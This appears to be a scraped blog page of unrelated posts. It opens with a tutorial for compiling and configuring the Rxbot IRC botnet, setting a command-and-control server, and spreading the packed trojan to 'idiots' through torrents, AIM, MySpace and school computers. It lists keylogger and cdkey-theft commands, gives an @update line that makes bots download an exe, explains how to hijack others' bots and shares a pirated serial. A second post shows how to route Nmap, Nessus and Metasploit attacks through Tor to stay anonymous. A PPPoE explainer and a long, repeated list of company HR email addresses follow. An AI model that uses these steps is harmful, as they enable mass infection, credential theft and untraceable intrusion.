How To Create And Compile Botnets To Autohack 1000ds of Systems

 i found a nice tut that helps u with the basics of the botnets

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:



Download

Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.



Q:What is a botnet?

A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".

Depending on the source you used, the bot can do several things.

I myself have helped write one of the most advanced and secure bot sources out there.

(Off topic)

But once again depending on the source you can :

Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".

Once again depending on the bot it may be able to kill other fellow competeter bots.

Or even kill AV/FW apon startup.

Add itself to registry.

Open sites.

Open commands.

Cmd,

notepad,

html,

Anything is possible !



Theres the infected computers "bots" the attacker, the server, and the victim.

Quote:

while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.



Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.



Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.

---------------

Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:

Download tutorial



-----------------------------

Here we go ladies and gentlemen

Follow the tutorial:

-----------------------------



I. Setting up the C++ compilier: (easy)



1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)

Mirror 2

Mirror 3 Direct

Pass: itzforblitz

Serial: 812-2224558



2. Run setup.exe and install. Remember to input serial



3. Download and install the Service Pack 6 (60.8 mb)



4. After that Download and install:



Windows SDK (1.2 mb)

Mirror 2

Mirror 3

Pass: itzforblitz

-------------------------------------



II. Configuring the C++ compilier (easy)



1. Open up Microsoft Visual C++ Compilier 6.0

2. Go to Tools > Options and Click the "Directories" tab

3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Quote:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE

C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)





(it does not matter whats below those lines)

---------------------------------------



III. Configuring your bot: (easy)



1. Download and unpack:

Rxbot 7.6 (212.3 kb)

Mirror 2

Mirror 3



2. You should see an Rxbot 7.6 folder

3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Quote:

Put in quotations:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)

char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)

char serverpass[] = ""; // server password (not usually needed)

char channel[] = "#botz_channel"; // channel that the bot should join

char chanpass[] = "My_channel_pass"; // channel password



Optional:

char server2[] = ""; // backup server

char channel2[] = ""; // backup channel

char chanpass2[] = ""; //Backup channel pass

-----------------------------------

IV. Building your bot: (very easy)



1. Make sure Microsoft Visual C++ is open

2. Select "File > Open Workspace"

3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file

4. Right Click "rBot Files" and click Build:





5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!



YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

-------------------------------------

Command list

Download Command list



Basics:

.login botpassword will login bots

.logout will logout bots

.keylog on will turn keylogger on

.getcdkeys will retrieve cdkeys.

Read command list for more

-----------------------------------

Download mIRC



mIRC

Mirror 2

Mirror 3

--------------------------------------------------------------------------------------------

How to secure your bots:



Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.

To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)

and update the channel topic and run:

Quote:

@update http://www.mybot.com/download/SMSPRO.exe 82

The http://mybot.com is your bot's download link and the 82 can be any number(s)

Now steal their bots and have them join your channel

To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.



To secure your self:



It is fairly easy to secure your bots, here is how:



1. When you are in your right click on your chat window and select "Channel Modes"

2. Make sure these options are checked:







This way no one besides you or another op can set the channel topic

Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.

------------------------------------------------------------------------

Good IRC Servers:



I would recommend running your botnet on a private server.

If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

Read More

How To perform Anonymous Port scanning using Nmap and Tor

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Web. It also permits developers / researchers to generate new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that permit organizations and individuals to share information over public networks without compromising their privacy

The Onion Router [TOR] is an excellent work towards defending online privacy. As of with every debate about exploitation frameworks, security tools, vulnerability disclosures such projects have also been victim of criticism, and debates of potential abuse that they may cause and the dangers of teaching individuals a dangerous and potentially illegal craft and a ‘secure’ channel to hide their online presence. But lets face it, the bad guys already know about it (that is the reason they’re bad ‘eh). However although these channels of misuse and abuse do exist and they cannot be ignored, still the merits of it will always outweigh the harm black community may cause.

Regrettably in the country I live in even most of the senior know-how people I meet / see / have a chance to work with, don’t even have a clue of online privacy or security of their information.

Privacy is every individuals right, and is as important as any other basic human need. You will seldom require somebody tracking your IP, spywares tracing your network activity, and the next time you try to experiment with something, you receive a disagreeable small e mail from an ISP admin that you were doing so-and-so. I am by no way TEMPTING you to do something wrong. Its all about your morale and motivation : ) , the small how-to below is a kick starter for getting started with TOR and experimenting with some stuff securely. Interested ? move on, but don’t go about emailing me that this stuff like this is illegal to be posted and ought to be removed.

The problem

A basic issue for the privacy minded is that the recipient of your communication / conversation or even otherwise can see that you sent it by taking a look at the IP headers, or worse trace the whole path. And so can authorized intermediaries like ISPs, govt. organizations etc, and sometimes unauthorized intermediaries as well. A very simple type of network traffic analysis might involve sitting somewhere between sender and recipient on the network (man-in-the-middle), taking a look at headers.

But there's also more powerful kinds of packet analysis. Some attackers spy on multiple parts of the Web and use sophisticated statistical techniques to track the communications patterns of plenty of different organizations and individuals. Encryption does not help against these attackers, since it only hides the content of Web traffic, not the headers (VPN ? duh!!) .

The solution:

A distributed, anonymous, secure network

To reduce the risks of both simple and sophisticated traffic analysis by distributing your web traffic over several places / servers, so no single point can link you to your location helps defending your privacy. Its like taking a zig-zag random, hard to follow path to deceive somebody who is tracing you (what the heroes usually do against the villain in action films : ) ) , then periodically erasing your footprints. In lieu of taking a direct route from source to location, information packets on TOR take a random pathway through several servers that cover your tracks so no observer at any single point can tell where the information came from or where it is going.

TOR incrementally builds a circuit of encrypted connections through servers on the network which is extended one hop at a time, and each server along the way knows only which server gave it information and which server it is giving information to. No individual server ever knows the whole path that a knowledge packet has taken. The client negotiates a separate set of encryption keys for each hop along the circuit to make positive that each hop cannot trace these connections as they pass through.

Two times a circuit has been established any information can be exchanged and because each server sees no over one hop in the circuit, neither an eavesdropper nor a compromised server can use traffic analysis to link the connection's source and location.

Tor only works for TCP streams and can be used by any application with SOCKS support.

to experiment and write this small how-to, I setup a server on the Web that I desired to scan from my home network using Nmap, Nessus, and metasploit from my bacttrack suite installed in a VM. Here are the steps I followed to launch the scan / exploitation method by Tor:

A. Installing TOR: Detailed instructions can be viewed on the net site.

B) Download socat .This gizmo is an excellent multipurpose relay and will permit to setup a local TCP listener that will tunnel my connections by the Tor SOCKS server (listening on 9050).

Unfortunately socat comes only on bsd and *nix systems. To make use of TOR on windows I would recommend using Privoxy, or better installing the whole TorCP bundle.



Let us assume that the IP address of the host I desired to scan was 202.163.97.20

I invoked socat:

[talha@localhost#] ./socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1: 202.163.97.20:80, socksport=9050

The above command causes socat to listen on port 8080, and tunnel all incoming connections to 202.163.97.20 (port 80) by the Tor SOCKS server.

For using on windows you will need to:

1. Install privoxy

2. permit HTTP CONNECT requests by 80 through your firewall

3. Browse to http://config.privoxy.org/show-status

C. I assume Nmap, Nessus and metasploit are already installed and running. If not you can find the detailed instrucations on respective website.

D. Launch an nmap connect or nessus scan against 127.0.0.1 port 8080. Configure Nessus to limit the scan to port 8080 in the “Scan Options” tab.

Here are a quantity of the entries in my Apache log that were a result of the scan:

212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /Album/ HTTP/1.1" 404 204 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 209 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /cgi-bin/wiki.pl? HTTP/1.1" 404 213 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

The 212.9.32.5 IP address represents the host that is the last onion router in the random circuit that was setup by the Tor program

Simlarly two times you discover a vuln in a remote technique, setup another instance of socat: Say for simplicity you are exploiting a webserver (port 80).

[talha@localhost#] ./socat TCP4-LISTEN:1234,fork SOCKS4:127.0.0.1: 202.163.97.20:80,

In metasploit when launching the exploit, set the target IP to 127.0.0.1 and remote port to 1234. Its that simple eh.

The above instructions may even be used to exploit program flaws in order to anonymously execute arbitrary commands on vulnerable hosts.



Some pieces of advice:

1. Nmap makes use of something that generates packets by the raw packet interface so the packets connect directly to the target, not by Tor. For example:

Doing a connect() scan (TCP) will work with Tor but using something like -sS connects directly to the target, revealing your true address.

2. Nmap & Nessus will often ping a target so see if it is up before doing a port scan. This is usually completed by raw ICMP packet's, ICMP won't traverse the Tor network (since its not TCP) and will reveal your true address.

In the usage of socat, socks4 does client side DNS. So you resolve a target host name by DNS from your machine not by the Tor network proxies.

Hence it is impossible to leak your source IP because you tell your scanner to make use of 127.0.0.1 as the target IP . Therefore, nmap / nessus has no host name to resolve, and in case you do forget to tell your scanner not to bother with ICMP pings, you will finish up pinging yourself – not the target directly.

Staying anonymous

Tor cannot solve all anonymity issues. It focuses only on defending the transport of information. You will need to make use of protocol-specific support program in case you don't require the sites you visit to see your identifying information. For example, you can use web proxies such as Privoxy and open relays while web browsing to block cookies and withhold information about your browser type ident.

Be clever. Don't provide your name or other revealing information in web forms. Be aware that, like all anonymizing networks that are fast for web browsing, Tor does not provide protection against end-to-end timing assaults: If your attacker can watch the traffic coming out of your computer, and also the traffic arriving at your selected location, they can use statistical analysis to discover that they are part of the same circuit.

The Electronic Privacy Information Centre (EPIC) lists down a comprehensive list which servers as a sampling of best available privacy enhancing tools.

Read More

Circuit search engine

Search for a circuit you are in need of from here...

Read More

What Is PPPoE and bridge mode of ADSL Modem

There are two ways to configure an ADSL modem for broadband connection. One in PPPoE (Point to Point Protocol over Ethernet) and the another is Bridge mode.

PPPoE Mode

In this mode the modem works as router and the PPPoE session terminates on WAN port of router. The PPPoE client is in built in the modem and allocated by BRAS server gets assigned to WAN port of modem. The Internal network has to use the private IP and for Internet access NATing happens in modem. In PPPoE mode the modem is configured in such a way that the user id and password are stored inside the Modem. Internet connection will be established as you switch on the Modem.

PPPoE Mode

Bridge Mode

In this mode the modem works as transparent Ethernet bridge and therefore you need to run the PPPoE client software ( for login authentication) on your PC/server. WIN XP systems have this feature inbuilt but for other operating systems you need to buy it from market. Some freeware like RASPPPoE, Enternet etc. are also available on the Internet.

bridge mode

Both the modes can be used as per the requirement and application. Here enumerating the main differences

PPPoE mode

1. User id and password stored inside the Modem.

2. Multiple PCs can be connected. For example most of the basic ADSL Modems having at least one ADSL port and one USB port. In PPPoE mode, can connect one PC to Ethernet port and one PC to USB port which enable simultaneous internet usage in both the PCs.

3. PPPoE mode is more secured.

4. For Torrents download, appropriate ports need to be forwarded.

Bridge Mode



1. In bridge mode user id and password to be entered in the dialer of computer.

2. Only single PC can be connected.

3. For torrents download port forwarding is not required.

4. Less secured because all the ports are open need good firewall to avoid virus infection.

Read More

GET A JOB IN A COMPANY BY SENDING CV TO THESE EMAIL IDs (ONLY FOR INDIANS) [year 2010]

CLICK HERE TO SEARCH FOR A JOB YOU ARE INTERESTED IN. LIST OF SOFTWARE COMPANIES HR E-MAIL IDs WITHIN INDIA ARE 

INTEL npwhrindia@intel.com Bangalore 

 ORACLE naveen.vemula@oracle.comsuman.rajeev@oracle.com Bangalore 

 LUCENT hrindia@lucent.com Bangalore 

 SONY dreamjob@sisc.in.sony.com.sg Bangalore Singapore 

HUGHES hsshr@hss.hns.com Delhi Bangalore 

 NORTEL nadhr@nortelnetworks.com 

 TCS recruitment@blore.tcs.co.in Bangalore 

 Veritas bangalore@vxindia.veritas.com Unix Bangalore 

Aspect Dev jobs@india.aspectdv.com Ecom Bangalore

 MBT resume@mahindrabt.com Pune 

 HP resumes@india.hp.com Bangalore 

 HCL Tech rsriram@hclt.com 

 PENTAFOUR muralikrishna@pentafour.com 

NOVELL career@novell.com Bangalore 

 SUN careers@india.sun.com Bangalore 

 BPL Innovision - jobs@bplinnovision.com 

 D E Shaw - recruit-india@deshaw.com 

Hyderabad iCode - hr_india@icode.com 

 PTPL - prakash@ptpl.com 

InfoGain hrdindia@india.infogain.com 

Delhi Satyam globaltalent@bet.satyam.com Bangalore 

PSI resumes@psi.soft.net Bangalore 

 StumpVision stumpvision@blr.vsnl.net.inkrish@stumpvision.com

 Infosys bangalore.hrd@inf.com 

Siemens hmsrecruit@sisl.co.in Bangalore 

 Wipro careers@wipro.com Bangalore 

American Data Solutions adsihr@gafri.com Bangalore 

Healtheon jobs@healtheonindia.com 

HCL Tech resumeblr@hclt.com 

 Bharti Telesoft careers@bhartitelesoft.com

 IBM osudar@in.ibm.com mamol@in.ibm.com 

 For Lucent skg@spectrumconsultants.com 

GE India itl.geitc@geind.ge.com Bangalore 

iCope hrd@icope.com 

Wireless NATIONAL careers@malkauns.nsc.com 

Embedded Philips pscareers2000@philips.com 

Embedded BOSCALLEO hr@boscalleo.com 

Ecomm IT Solutions careers_2000@its.soft.net 

HCL Tech careerb@msdc.hcltech.com 

NIHILENT career@nihilent.com 

Infosys careers@inf.com 

CISCO india_jobs@cisco.com 

Networking PEOPLE.COM speri@techpeople-india.com US NetBrahma Want2b@netbrahma.com Systems SunCoreSoft hrd@suncoresoft.com Ishoni jobs@ishoni.com LG Software I walkin@lgsi.com Ecom , Embedded HPS Global hps.rmg@hpsglobal.com Reliance , US jobs@reliance.com ESCOSOFT carer@escosoft-tech.com US SERANOVA careerindia@seraova.com Ecom TeleSoft hrd@indts.com Telecom SSI infinity@ssi-technologies.com Bangalore MelStar bstp@melstar.com Bombay Chennai USInteractive careers@usinteractive.com US Cerebra jobs@cerebracomputers.com Empowertel hrindia@empowertel.com PTC hrtoi@india.ptc.com PUNE Siri Technolgoies hr@siritech.com ALIT hr@alit.soft.net i-Flex sandeep.bhattacharya@iflexsolutions.com CosmoNet hrd@cosmonetsolutions.com POLARIS resume_toib@polaris.co.in RAS Infotech resumes@rasinfotech.com SIP Technolgies hrd@siptech.co.in SNS Tech careers@snstech.com AUTODESK crvcon@vsnl.com LGSoft onsite_java@lgsi.com Kindle work_here@kindlesystems.com PUNE US UK InfoStrands infostrands@gtvltd.com ObjectOrb hr@objectorb.com Comnet hrd@comneti.com telecom CIS hrtelecom@cisindia.com OnwardGroup geetha_cherian@onwardgroup.com Green Microsystems jobs@greenmicrosystems.com STPI personnel@stpb.soft.net Quark careers@quark.stpm.soft.net MOHALI DelDot subbu@deldot.com SUBEX ganesh@subegroup.com SIERRAOPT career@sierraopt.com DSQ recruit_ecom@md.in.dsqsoft.com CHENNAI IIC hr@iictechnologies.com CYBERTECH ecomjobs@cybertech.com FormulaSys resumes@FormulaSys.com US WorkFlow hr@workflow.com SystemLogic got2b@SystemLogic.com CyberAnalysts resume@cyberanalysts.com IMPETUS hr@impetus.co.in INDORE VISTEON svadivel@VISTEON.com EMBEDDED Amadee myjobs@amadee.de INTERNET WEBTEK webtek_jobs@dresdner-bank.com CIRRUS LOGIC hrd@cirrus.stpp.soft.net TCS Chennai resume@chennai.tcs.com TVSFUGEN mjojo@tvsfugen.com Onscan -Wireless - jobs@onscan.com EmbeddedWireless jobs@EmbeddedWireless.com DECCANET career@deccanetdesigns.com DuskValley joinus@DuskValley.comduskvalley@vsnl.com INTERNET SEMA hrd@sema.co.in CALCUTTA TElecom FTD future4u@ftdpl.com.sg DSP / Telecom SAS careers@sasi.com SPIKE design@spikeindia.soft.net EDA / ASIC HCL freedom@ggn.hcltech.com Aptech corporatetrg@aptech.co.in Datamatics psaib@datamatics.com BOMBAY AQUILA hrd@aquila.soft.net Graphics , EBusiness DATUM careers@datumtec.com HUGHES resumetoib@hss.hns.com AMBER india_jobs@ambernetworks.com Networking Integra career@integramicro.com Lante cvindia@lante.com DELHI -Ecom RELQ RELQusa@RELQ.com Sonata-US hrd@sonata-software.com areer@sonata-software.com ZAP hrdbg@skillsandjobs.com Zensar dreamcareers@zensar.com Spectrum , Singapore ravikum@mbox2.singnet.com.sg Forbes, UK forbeshr@bgl.vsnl.net.in forbesbg@bgl.vsnl.net.in Synopsys guru@synopsys.com JobCurry Australia map@jobcurry.com Singapore, UNIX cn66@vsnl.com Sun Tech US hr@suntechnologies.com HCL Tech - careers@noida.hclt.com Noida Infosys - engserv@inf.com HTC - htc.blr@htcinc.com CGSmith - resume@cgs.cgsmith.soft.net APCC - irecruit@apcc.com TechDrive sunitha@techdriveintl.com UniqueComputing careers@uniquecomputing.com US Accord Soft asiapacific@accord-soft.com ORACLE naveen.vemula@oracle.com, suman.rajeev@oracle.com LUCENT hrindia@lucent.com SONY dreamjob@sisc.in.sony.com.sg Bangalore Singapore HUGHES hsshr@hss.hns.com NORTEL nadhr@nortelnetworks.com TCS recruitment@blore.tcs.co.in Veritas bangalore@vxindia.veritas.com Aspect Dev jobs@india.aspectdv.com MBT resume@mahindrabt.com HP resumes@india.hp.com HCL Tech rsriram@hclt.com PENTAFOUR muralikrishna@pentafour.com NOVELL career@novell.com Bangalore SUN careers@india.sun.com Bangalore BPL Innovision – jobs@bplinnovision.com D E Shaw – recruit-india@deshaw.com Hyderabad iCode – hr_india@icode.com PTPL – prakash@ptpl.com InfoGain hrdindia@india.infogain.com Delhi Satyam globaltalent@bet.satyam.com Bangalore PSI resumes@psi.soft.net Bangalore StumpVision stumpvision@blr.vsnl.net.in krish@stumpvision.com Infosys bangalore.hrd@inf.com Siemens hmsrecruit@sisl.co.in Bangalore Wipro careers@wipro.com Bangalore American Data Solutions adsihr@gafri.com Bangalore Healtheon jobs@healtheonindia.com HCL Tech resumeblr@hclt.com Bharti Telesoft careers@bhartitelesoft.com IBM osudar@in.ibm.com mamol@in.ibm.com For Lucent skg@spectrumconsultants.com GE India itl.geitc@geind.ge.com Bangalore iCope hrd@icope.com Wireless NATIONAL careers@malkauns.nsc.com Embedded Philips pscareers2000@philips.com Embedded BOSCALLEO hr@boscalleo.com Ecomm IT Solutions careers_2000@its.soft.net HCL Tech careerb@msdc.hcltech.com NIHILENT career@nihilent.com Infosys careers@inf.com CISCO india_jobs@cisco.com Networking PEOPLE.COM speri@techpeople-india.com US NetBrahma Want2b@netbrahma.com Systems SunCoreSoft hrd@suncoresoft.com Ishoni jobs@ishoni.com LG Software I walkin@lgsi.com Ecom , Embedded HPS Global hps.rmg@hpsglobal.com Reliance , US jobs@reliance.com ESCOSOFT carer@escosoft-tech.com US SERANOVA careerindia@seraova.com Ecom TeleSoft hrd@indts.com Telecom SSI infinity@ssi-technologies.com Bangalore MelStar bstp@melstar.com Bombay Chennai USInteractive careers@usinteractive.com US Cerebra jobs@cerebracomputers.com Empowertel hrindia@empowertel.com PTC hrtoi@india.ptc.com PUNE Siri Technolgoies hr@siritech.com ALIT hr@alit.soft.net i-Flex sandeep.bhattacharya@iflexsolutions.com CosmoNet hrd@cosmonetsolutions.com POLARIS resume_toib@polaris.co.in RAS Infotech resumes@rasinfotech.com SIP Technolgies hrd@siptech.co.in SNS Tech careers@snstech.com AUTODESK crvcon@vsnl.com LGSoft onsite_java@lgsi.com Kindle work_here@kindlesystems.com PUNE US UK InfoStrands infostrands@gtvltd.com ObjectOrb hr@objectorb.com Comnet hrd@comneti.com telecom CIS hrtelecom@cisindia.com OnwardGroup geetha_cherian@onwardgroup.com Green Microsystems jobs@greenmicrosystems.com STPI personnel@stpb.soft.net Quark careers@quark.stpm.soft.net MOHALI DelDot subbu@deldot.com SUBEX ganesh@subegroup.com SIERRAOPT career@sierraopt.com DSQ recruit_ecom@md.in.dsqsoft.com CHENNAI IIC hr@iictechnologies.com CYBERTECH ecomjobs@cybertech.com FormulaSys resumes@FormulaSys.com US WorkFlow hr@workflow.com SystemLogic got2b@SystemLogic.com CyberAnalysts resume@cyberanalysts.com IMPETUS hr@impetus.co.in INDORE VISTEON svadivel@VISTEON.com EMBEDDED Amadee myjobs@amadee.de INTERNET WEBTEK webtek_jobs@dresdner-bank.com CIRRUS LOGIC hrd@cirrus.stpp.soft.net TCS Chennai resume@chennai.tcs.com TVSFUGEN mjojo@tvsfugen.com Onscan -Wireless – jobs@onscan.com EmbeddedWireless jobs@EmbeddedWireless.com DECCANET career@deccanetdesigns.com DuskValley joinus@DuskValley.com duskvalley@vsnl.com SEMA hrd@sema.co.in CALCUTTA TElecom FTD future4u@ftdpl.com.sg DSP / Telecom SAS careers@sasi.com SPIKE design@spikeindia.soft.net EDA / ASIC HCL freedom@ggn.hcltech.com Aptech corporatetrg@aptech.co.in Datamatics psaib@datamatics.com BOMBAY AQUILA hrd@aquila.soft.net Graphics , EBusiness DATUM careers@datumtec.com HUGHES resumetoib@hss.hns.com AMBER india_jobs@ambernetworks.com Networking Integra career@integramicro.com Lante cvindia@lante.com DELHI -Ecom RELQ RELQusa@RELQ.com Sonata-US hrd@sonata-software.com career@sonata-software.com ZAP hrdbg@skillsandjobs.com Zensar dreamcareers@zensar.com Spectrum , Singapore ravikum@mbox2.singnet.com.sg Forbes, UK forbeshr@bgl.vsnl.net.in forbesbg@bgl.vsnl.net.in Synopsys guru@synopsys.com JobCurry Australia map@jobcurry.com Sun Tech US hr@suntechnologies.com HCL Tech – careers@noida.hclt.com Noida Infosys – engserv@inf.com HTC – htc.blr@htcinc.com CGSmith – resume@cgs.cgsmith.soft.net APCC – irecruit@apcc.com TechDrive sunitha@techdriveintl.com UniqueComputing careers@uniquecomputing.com US Accord Soft asiapacific@accord-soft.com ZenSoft hrd.zensoft@pacific.net.sg Singapore Zenith hr@zenithsoft.com Mumbai Velocient rsg@in.velocient.com Delhi , US Selectica hr_bgl@selectica.com Think Inc. jobs@thinkbn.com Coimbatore – Mphasis hr@mphasis.com Digital di.recruit@digital.com Alopa hrindia@alopa.com Silicon Automation Systems careers@sasi.com Birla Software recruitment@birlasoftware.com WebXL jobs@webxl.com Talisma got2b@talisma.com Aditi got2b@aditi.com want2b@aditi.com AmSoft hrd@amsoftis.com Bangalore Software jobs@bangaloresoftware.com ARTHUR ANDERSEN rescw@arthurandersen.com Raffles careers@raffles.soft.net ECosmos hr_ecosmos@netkracker.com SAP sanjukta.sarkar@sap.com PUNDITS protocol@pundits.com AZTEC jobs@aztecsoft.com Infy Banking Software banking_hrd@infy.com Infy IS Software careers.IS@inf.com HPS Global opportunities@hpsblr.soft.net CSS jobs@csshome.net CBSI recruiting@cbsinc.com NetGalactic hr@netgalactic.com Orbit-e livefree@orbit-e.com is3c hr@is3c.com Tenet jobs@tenetindia.com GMR Info opportunities@gmrinfo.com Intergraph resume_india@intergraph.com Net-Kraft be@net-kraft.com Honeywell career@hiso.honeywell.com TEIL hrssg@teil.soft.net CMG careers@cmg.nu CMC hrd@blr.cmc.net.in ComInsights general@cominsights.com MultiTech – resume@multitech.co.in COMPANY WEBSITES AND HR ADDRESSES Address: IBM India Golden Towers Airport Road Bangalore-560 017 Phone : 160-0443333 Email: [ direct | at | in.ibm.com ] Website: www.ibm.co.in Current vacancies: WIPRO: Address: Corporate Office Wipro Technologies Doddakannelli Sarjapur Road Bangalore - 560 035 Phone: +91 (80) 28440011 E-mail: [ info | at | wipro.com ] Website: www.Wipro.com Resumes: [ manager.career | at | wipro.com ] HR: [ head.recruitment | at | wipro.com ] Current vacancies: http://careers.wipro.com INFOSYS Address: No.138, Old Mahabalipuram Road, Sholinganallur, Chennai 600 119. Phone: (044) 24509530/40 Website: www.infosys.com Resumes: [ careers | at | infy.com ] HR: [ hravichandar | at | infosys.com ] Current vacancies: http://www.infosys.com/careers/ TCS: Address: Air India Building, 11th Floor, Nariman Point, Mumbai 400 021 Phone: +91-22-56689999 Email: [ tcs_corpoffice | at | mumbai.tcs.co.in ] Werbsite: www.tcs.com Resume: [ careers.hrd | at | tcs.com ] Current vacancies: http://www.tcs.com/0_careers/hotjobs_india/index.htm HCL Address: HCL Technologies Ltd. A-10/11, Sector 3 Noida- 201 301, UP,India Website: www.hcltech.com Phone: +91-120-252-0917/37 Current vacancies: http://www.hcltech.com/careers-default.asp HEXAWARE Address: Hexaware Technologies, Hexaware Towers, 51/3, G.N Chetty Road, T.Nagar, Chennai - 600 017 Phone: 91-44-52001600 E-mail: [ info | at | hexaware.co.in ] WebsIte: www.hexaware.com Resumes: http://www.hexaware.com/presume.htm HR: [ recruit | at | hexaware.com ] Current vacancies: http://www.hexaware.com/careerhome.htm Infodesk Manipal Ltd Specialisation: GIS Application Software, GIS Services, Web ensbled Applications, Engineering Services Website: www.infodeskmanipal.com Email: pratap@infodeskmanipal.com Location: Bangalore iSeva Systems Pvt Ltd Specialisation: CRM Consulting, Outsourcing of customer service Website: www.iseva.com Email: vaibhav@india.iseva.com Location: Bangalore IonIdea Interactive Private Limited Specialisation: Internet Middleware and Intranet Migration, Web Content Development, Datawarehousing & Data Mining, Transaction Automation & E-commerce Website: www.ionideainteractive.com Email: casper@cgipl.com Location: Bangalore i-flex Solutions Limited Specialisation: Software products & Services for the Banking & Finance Industry Website: www.iflexsolutions.com Email: r.ravisankar@citicorp.com Location: Bangalore IBM Global Services India Private Limited Specialisation: E-commerce Solutions, ERP Implementation services, Software development and maintenance, Business Intelligence Solutions Website: www.ibm.com Location: Bangalore IMRGlobal Ltd. Specialisation: Banking, Insurance, Financial Sectors, Manufacturing, Retail, Consumer goods, System, Integration Telecommunication, E-commerce Website: www.imrglobal.com Email: santosh@bangalore.imrglobal.com Location: Bangalore Infiniti Infotech India Pvt. Ltd. Specialisation: End-to-end internet solutions, including web sites, intranet,extranet, E-commerce and web enabled supply chain solutions based on XML technology. Website: www.i-three.com Email: svasu@i-three.com Location: Bangalore Infosys Technologies Limited Specialisation: Web Technologies / Internet / Intranet, Telecom Solutions / Communications Software, Business Process consultancy / Re-engineering, Software Maintenance and Migration Website: www.itlinfosys.com Email: infosys@inf.com Location: Bangalore Intel Asia Electronics, Inc. Specialisation: Chip Design, Microprocessor, ASIC, Telecom Solutions, Communication Software, E- commerce, EDI, Web Technologies, Internet , Intranet Website: www.intel.com Location: Bangalore ITTI Limited Specialisation: ERP Services, Business Intelligence, Help Desk Operations, Web-enabled applications Website: www.tttp.com Email: itti.blr@itti.co.in Location: Bangalore IT Solutions (India) Pvt. Ltd. Specialisation: Development of Application in Client Server, Web, Internet, E-commerce, Porting, Migration & Maintenance of application in Unix/NT, Platform, Specialisation in Data Warehousing, E-Commerce, Implementation, Support for ERP Application Website: www.itsindia.com Email: anands_at_home@yahoo.com Location: Bangalore Ivega Corporation Specialisation: IBM AS/400 and RS 6000, Development and re-engineering, client-server technologies, Internet technologies, E-Biz technologies, Product development, IT consultancy, 